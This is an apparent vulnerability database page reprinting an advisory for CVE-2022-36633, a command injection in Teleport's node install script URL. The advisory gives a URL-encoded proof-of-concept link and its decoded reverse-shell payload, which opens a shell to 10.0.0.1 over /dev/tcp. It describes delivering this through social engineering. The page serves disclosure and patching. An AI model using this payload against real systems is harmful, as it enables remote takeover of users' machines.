Vulners
Lucene search
Teleport 9.3.6 Command Injection
🗓️ 23 Aug 2022 00:00:00Reported by Brian Landrum, Brandon RoachType 
packetstorm🔗 packetstormsecurity.com👁 614 Views
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | Teleport 9.3.6 Command Injection Vulnerability | 23 Aug 202200:00 | – | zdt |
| Teleport v10.1.1 - Remote Code Execution Vulnerability | 23 Sep 202200:00 | – | zdt |
 | CVE-2022-36633 | 24 Aug 202213:15 | – | attackerkb |
 | CVE-2022-36633 | 24 Aug 202216:27 | – | circl |
 | Teleport 操作系统命令注入漏洞 | 23 Aug 202200:00 | – | cnnvd |
 | CVE-2022-36633 | 24 Aug 202212:29 | – | cve |
 | CVE-2022-36633 | 24 Aug 202212:29 | – | cvelist |
 | Teleport v10.1.1 - Remote Code Execution (RCE) | 23 Sep 202200:00 | – | exploitdb |
 | Improper token validation leading to code execution in Teleport | 25 Aug 202200:00 | – | github |
 | CVE-2022-36633 | 24 Aug 202213:15 | – | nvd |
10
`Description:Teleport 9.3.6 is vulnerable to Command injection leading to Remote
Code Execution. An attacker can craft a malicious ssh agent
installation link by URL encoding a bash escape with carriage return
line feed. This url encoded payload can be used in place of a token and
sent to a user in a social engineering attack. This is fully
unauthenticated attack utilizing the trusted teleport server to deliver
the payload.
Additional Information:https://goteleport.com/
https://github.com/gravitational/teleport
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36633
Vulnerability Type: otherCommand injection leading to Remote Code Execution
Vendor of Product:Teleport - https://goteleport.com/
Affected software version: Teleport version < v10.1.2
Affected Component:https://teleport.examplesite.com/scripts/*INJECTION-POINT*/install-node.sh?method=iam <https://teleport.site.com/scripts/*INJECTION-POINT*/install-node.sh?method=iam>
Attack Type:Remote
Impact:Code Execution
Impact Other:This vulnerability allows an attacker to inject code into a bash script without authentication, and craft a legitimate link hosted on the teleport server to use in social engineering attacks. When a user executes the command to install an teleport SSH agent with the crafted link, it will install the teleport agent and without the users knowledge, execute malicious code in the background.
Attack Vectors:An attacker can craft a malicious ssh agent installation link by URL encoding a bash escape with carriage return line feed. This url encoded payload can be used in place of a token and sent to a user in a social engineering attack. This is fully unauthenticated attack utilizing the trusted teleport server to deliver the payload.
Example POC payload: https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%30%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?method=iam <https://teleport.site.com/scripts/%22%0a%2fbin%2fbash%20-l%20%3e%20%2fdev%2ftcp%2f10.0.0.1%2f5555%200%3c%261%202%3e%261%20%23/install-node.sh?method=iam>
Decoded payload:
"
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #
Patch information:https://goteleport.com/docs/changelog/#1012
https://github.com/gravitational/teleport/pull/14944
------------------------------------------
Discoverers:
Brandon Roach & Brian Landrum
------------------------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Aug 2022 00:00Current
8.9High risk
Vulners AI Score8.9
EPSS0.3029